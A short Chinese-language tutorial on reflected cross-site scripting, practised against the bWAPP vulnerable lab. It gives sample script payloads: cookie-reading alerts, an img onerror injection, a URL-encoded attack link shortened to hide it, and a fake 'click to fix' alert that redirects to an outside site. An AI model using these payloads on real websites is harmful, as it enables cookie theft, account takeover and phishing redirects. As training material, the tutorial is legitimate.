XSS（跨站指令碼攻擊）

定義

瀏覽器將使用者輸入的內容，當做指令碼執行，執行了惡意的功能，這種針對使用者瀏覽器的攻擊即跨站指令碼攻擊。

型別

主要分為三種類型：

• 反射型

• 儲存型

• DOM 型

XSS 危害

• 盜取 Cookie
• 盜取賬戶
• 惡意軟體下載
• 鍵盤記錄
• 廣告引流等等 JavaScript 能夠寫出的任意惡意功能

反射型 XSS

應用程式或 API 包括未經驗證或未經轉義的使用者輸入， 直接作為HTML 輸出的一部分。一個成功的攻擊可以讓攻擊者在受害者的瀏覽器中執行任意的 HTML 和 JavaScript 。

特點：非持久化，必須使用者點選帶有特定引數的連結才能引起。

影響範圍：僅執行指令碼的使用者。

示例

SkyMacBookPro:~ demon$ docker run -d -p 0.0.0.0:8901:80 raesene/bwapp

<script>alert("hello world")</script>

<script>alert("點選此處修復");location.href="http://ceshis.com"</script>

<script>alert(document.cookie)</script>

長網址縮短 (https://www.ft12.com)

http://192.168.43.120:8901/xss_get.php?firstname=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&lastname=1&form=submit
 

http://33h.co/wr3wj

/><img src=111.png onerror=alert(document.cookie)>

防禦措施

反射型 XSS 的限制與防禦，危害範圍相對較小，多為一次點選觸發一次，對陌生的連結，不要隨意點開。

練習

對於 bWAPP 的不同型別反射型 XSS 漏洞練習。